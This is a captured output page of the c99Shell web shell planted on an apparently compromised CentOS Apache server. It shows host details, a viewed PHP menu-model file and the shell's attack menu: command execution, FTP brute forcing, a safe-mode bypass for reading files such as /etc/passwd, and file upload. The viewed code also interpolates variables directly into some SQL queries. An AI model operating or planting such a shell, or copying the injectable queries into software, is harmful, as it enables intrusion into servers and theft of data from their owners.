!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/models/ums/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     m_ummenu.php (3.68 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once("da_ummenu.php");
class 
M_Ummenu extends Da_ummenu {
    
//=== add your functions below

    
function getAll($aOrderBy=""){
        
$orderBy "";
        if (
is_array($aOrderBy)) {
            
$orderBy.="ORDER BY ";
            foreach (
$aOrderBy as $key => $value) {
                
$orderBy.= "$key $value, ";
            }
            
$orderBy substr($orderBy0strlen($orderBy)-2);
        }
        
$sql "SELECT * FROM ummenu $orderBy";
        
$query $this->db->query($sql);
        return 
$query ;
    }

    function 
RSByStIDPrIDLv($stid,$mnid,$lv){
        
$sql "SELECT *
                FROM ummenu
                WHERE MnStID = ?
                AND MnParentMnID LIKE ?
                AND MnLevel = ?
                ORDER BY MnID"
;
        
$result $this->db->query($sql, array($stid,$mnid,$lv));
    
//    echo $this->db->last_query();
        
return $result;
    }

    function 
RSByStIDGpIDUsIDPrIDLv($stid,$gpid,$usid,$mnid,$lv){
        
$sql "SELECT *
                FROM ummenu
                JOIN umsystem ON MnStID = StID
                WHERE MnStID = ?
                AND (MnParentMnID = ? OR MnParentMnID IS NULL)
                AND MnLevel = ?
                AND MnID NOT IN 
                (
                    SELECT distinct gp.gpMnID
                    FROM umgpermission gp
                    join ummenu mn ON gp.gpMnID = mn.MnID
                    WHERE gp.gpGpID = ?
                    AND mn.MnLevel = ?
                    AND gp.gpX = 0
                )
                AND MnID NOT IN 
                (
                    SELECT distinct pm.pmMnID
                    FROM umpermission pm
                    JOIN ummenu mn ON pm.pmMnID = mn.MnID
                    WHERE pm.pmUsID = ?
                    AND mn.MnLevel = ?
                    AND pm.pmX = 0
                )
                ORDER BY MnSeq"
;
        
$result $this->db->query($sql, array($stid,$mnid,$lv,$gpid,$lv,$usid,$lv));
        return 
$result;
    }

    function 
SearchByMnID($mnid){
        
$sql "SELECT *
                FROM ummenu
                JOIN umsystem ON MnStID = StID
                WHERE MnID LIKE ? "
;
        
$result $this->db->query($sql, array($mnid));
//        echo $this->db->last_query();
        
if($result->num_rows()<>0){
            return 
$result->row_array();
        }else{
            return 
false;
        }
    }

    function 
RSByParentMn($MnID,$MnStID=-1){
        
$condition "MnParentMnID = $MnID";
        if(
$MnID==0){
            
$condition "(MnParentMnID = $MnID OR MnParentMnID IS NULL)";
        }
        if(
$MnStID>=0){
            
$condition .= " AND MnStID = $MnStID";
        }
        
$sql "select * from ummenu where $condition order by MnSeq ASC";
        
$result $this->db->query($sql);
        return 
$result;
    }
    
    function 
updateMenu(){
        
$sql "UPDATE ummenu SET 
                    MnNameT = ?, 
                    MnNameE = ?, 
                    MnURL = ?, 
                    MnDesc = ?
                WHERE MnID = ? "
;
        
$this->db->query($sql, array($this->MnNameT$this->MnNameE$this->MnURL$this->MnDesc$this->MnID));
    }
    
    function 
lastMnID(){
        
$sql "SELECT * FROM ummenu WHERE MnStID = ? ORDER BY MnID DESC";
        
$query $this->db->query($sql,array($this->MnStID));
        if(
$query->num_rows()==0){
            return 
0;
        } else {
            return 
$query->row()->MnID;
        }
    }
    
    function 
deleteMenu() {
        
$sql "DELETE FROM ummenu WHERE MnID = ? OR MnParentMnID = ? ";
        
$this->db->query($sql,array($this->MnID,$this->MnID));
    }
    
    function 
deleteSystem() {
        
$sql "DELETE FROM ummenu WHERE MnStID  = ?";
        
$this->db->query($sql,array($this->MnStID));
    }
    
    function 
SaveSeq(){
        
$sql "UPDATE ummenu SET MnSeq = ? WHERE MnID = ? ";
        
$this->db->query($sql,array($this->MnSeq,$this->MnID));
    }
    
    
/*
    * get menu for permission group
    * @author    beeroma
    * @use         group/umGroupPermissionRe
    * @return     query
    * @Create Date 2554-10-27
    */
    
function RSByParentMnPermissionGroup($MnID,$MnStID=-1,$GpID){
        
$condition "MnParentMnID = $MnID";
        if(
$MnID==0){
            
$condition "(MnParentMnID = $MnID OR MnParentMnID IS NULL)";
        }
        if(
$MnStID>=0){
            
$condition .= " AND MnStID = $MnStID";
        }
        
$sql "SELECT * FROM ummenu 
        LEFT JOIN umgpermission ON ummenu.MnID = umgpermission.gpMnID AND umgpermission.gpGpID = {$GpID}
        WHERE $condition 
        ORDER BY MnIcon,MnSeq ASC"
;
        
$result $this->db->query($sql);
        return 
$result;
    }

//=== end class Ummenu


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]--